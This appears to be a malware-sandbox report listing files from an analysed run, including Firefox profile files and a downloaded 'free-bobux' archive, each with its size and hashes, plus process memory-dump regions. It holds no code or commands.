C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\pj0o4bl8.default-release\datareporting\glean\db\data.safe.tmp

Filesize
14KB

MD5
ede51a86219e23bd1cbe9b85e5d2faf2

SHA1
6756c3a4af314e9af7635a051fc7417cae6c6ef0

SHA256
592289c7c31bc0594054285318747465a72299d1693b34092c9c8b0a06e1a891

SHA512
98e710ccabf83e999820daaccbf8d8fb50d11a0bb92514758d72bae9075b82860c5cf362b2d160ab487a6b3d5fd112ea7714addbeacd927087c5acc54c9ef67f

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\pj0o4bl8.default-release\datareporting\glean\db\data.safe.tmp

Filesize
6KB

MD5
701c7726fe628260e08778a3b79a1765

SHA1
7f9f5f543c2bded3b95db52f444329fd84bee59e

SHA256
4c0c44c632bc495324f8d7ce1f7bcfe48eb746b8815e78c04b1daca2b1bf47a4

SHA512
14e93adfde5614819e3ee0b91ea3c37080aaddc25246564232948b0b169e14f4f380978a6c4c6cef2bef07fa36728de11350e42e3edadf19578674850b19ffd3

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\pj0o4bl8.default-release\datareporting\glean\pending_pings\23f2707f-6ac4-439c-84b2-57b476e69bbc

Filesize
982B

MD5
51e245e026e67b68a8223465132b1754

SHA1
8caa9083aea47b360e1ef0d1be00e3f364e54cf5

SHA256
703bb7c851cb55624a3675514bc9e66b54f9f0c83e65d66846be481fcdf17475

SHA512
c90047297c005bb0f294d7346ce5e4a34f6c5b209ec1d182b02ec2c68a756c2e33265ca1ca607710377aae6857c702e531ad1d5705fdbedf37d0106cba05145a

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\pj0o4bl8.default-release\datareporting\glean\pending_pings\7ef6f341-f51b-4526-942f-29891257c97b

Filesize
671B

MD5
7c43ba756ddcc76a9f579c4ab428388d

SHA1
322713acbd069af88bcb5520ccf3515134a62b6a

SHA256
5160ab8b92c8bb8f4372a5f2c030ba938b74ed83b35a7495d9ba251a4e762609

SHA512
065eb5e4aeb8672501eb2bb83350f2fd22b4ac9eebcd6b97335d287b2fabfc71743dff1b823682a548f28fa266cd5b0bc38cfb81e43d65140b307039b5204bef

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\pj0o4bl8.default-release\datareporting\glean\pending_pings\84a92eb9-fd3a-4993-96a9-0f01001e3483

Filesize
26KB

MD5
74450f1fecb3e2269f1ad1b57f556748

SHA1
289f81bd5fdf2ca6e91aeb3ce132b9feeeea936d

SHA256
1e3c9b214eaff65bb8bcb82cddeb132bea65b9e3de3a6f73f1d0c892eefe955b

SHA512
e1ebd4c2d111100ef4a9a67d2fd5912c1eafe5ddb21d5a62f46c7a3f8194f90eaaefef40d66258dc61afe3b5b35c8f625de411cdde9267b9bff4c8954fb1d60f

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\pj0o4bl8.default-release\datareporting\glean\pending_pings\d7f79229-5b62-475b-99b9-e6ef372f794b

Filesize
4KB

MD5
7005f8bcd6ba6914415b3d082432acd7

SHA1
4749723d3d930a56c7ca7f11d7682bae840991d9

SHA256
a22832dfa60ad03adc417ab70d01b05bf1a265a6cef098a0aed38a965b16ac5f

SHA512
3abc8721338c2e6ab8a5167274df3ea68ac20f4702cbabb9d9a5ad24648eb843df594eee937251bbebcb750ae4523dc660d867e88de9d771040adc5090c19a7c

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\pj0o4bl8.default-release\prefs-1.js

Filesize
11KB

MD5
9307c25c67b528d76957af61297d92a6

SHA1
6654b0b4b84bf323ab2c3cc5c02f7a2714712caf

SHA256
c0a7be8d204f16bd714dab589c4899a3954da9f11d54b90dd61d04ad7d8f5d60

SHA512
e0d3127d0b5a52378fd62e60e5adff8804aa87665868f2e818b2ea11baa56a26f7326e15d35efec2ee2e5ff3014cb36a29984336207ba8d562f9e4a63f0f1593

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\pj0o4bl8.default-release\prefs.js

Filesize
11KB

MD5
5f75488716185df58627fa13000168e8

SHA1
411104424c9623a482e29def4369bafaf5297448

SHA256
d29be770a6feaad1f242a199cad492fe34ded5085487b9cdff8af7b4997ace73

SHA512
12f4f82a0f5c9c805026a13d7474c75a9914597bfc701e04fb959474e80295f0b4c04605f6fbd522bbe37532c74b9843ca4ee8cd1e8875f480dc4177004f995f

Download Submit
C:\Users\Admin\Downloads\free-bobux-main.zip

Filesize
283KB

MD5
6238605d9b602a6cb44a53d6dc7ca40e

SHA1
429f7366136296dc67b41e05f9877ed762c54b73

SHA256
e315b421cb9bc6ae65fdeea180f5b12d2c4cf4117bf5872381bb20a1b28dbff9

SHA512
a8c5923c2e203cc2076030af51e4aa25f4c94b595a7f7d15c00c1c4e0eb91ae7734db9c3d59584642d18f5d63a8aecfadb06803a990ec51b668d3d93a079b1a7

Download Submit
C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2.zip

Filesize
3KB

MD5
d17192f01a339c46627a7fe999889926

SHA1
b927679c221f24cdb8efff9b0c9217732f72c0ba

SHA256
c379e5877854096616894ad805fcbce7b15226b1f06597ef70c8bf1aef642246

SHA512
35cc53e135396ee1760a8143f1a7e7e3433fd77ae54b76d92dca5f52be835125b78e47e5f211f9b418f0d32fca8679df2cb5cfb168dd4961e06a5b4fa6d135ee

Download Submit
memory/2260-1053-0x000001FA4AE40000-0x000001FA4AE62000-memory.dmp

Filesize
136KB

Download
memory/6140-1119-0x0000027FF9E60000-0x0000027FF9E61000-memory.dmp

Filesize
4KB

Download
memory/6140-1100-0x0000027FF11B0000-0x0000027FF11C0000-memory.dmp

Filesize
64KB

Download
memory/6140-1104-0x0000027FF1A60000-0x0000027FF1A70000-memory.dmp

Filesize
64KB

Download
memory/6140-1111-0x0000027FF9D40000-0x0000027FF9D41000-memory.dmp

Filesize
4KB

Download
memory/6140-1113-0x0000027FF9DC0000-0x0000027FF9DC1000-memory.dmp

Filesize
4KB

Download
memory/6140-1115-0x0000027FF9DC0000-0x0000027FF9DC1000-memory.dmp

Filesize
4KB

Download
memory/6140-1116-0x0000027FF9E50000-0x0000027FF9E51000-memory.dmp

Filesize
4KB

Download
memory/6140-1117-0x0000027FF9E50000-0x0000027FF9E51000-memory.dmp

Filesize
4KB

Download
memory/6140-1118-0x0000027FF9E60000-0x0000027FF9E61000-memory.dmp

Filesize
4KB

Download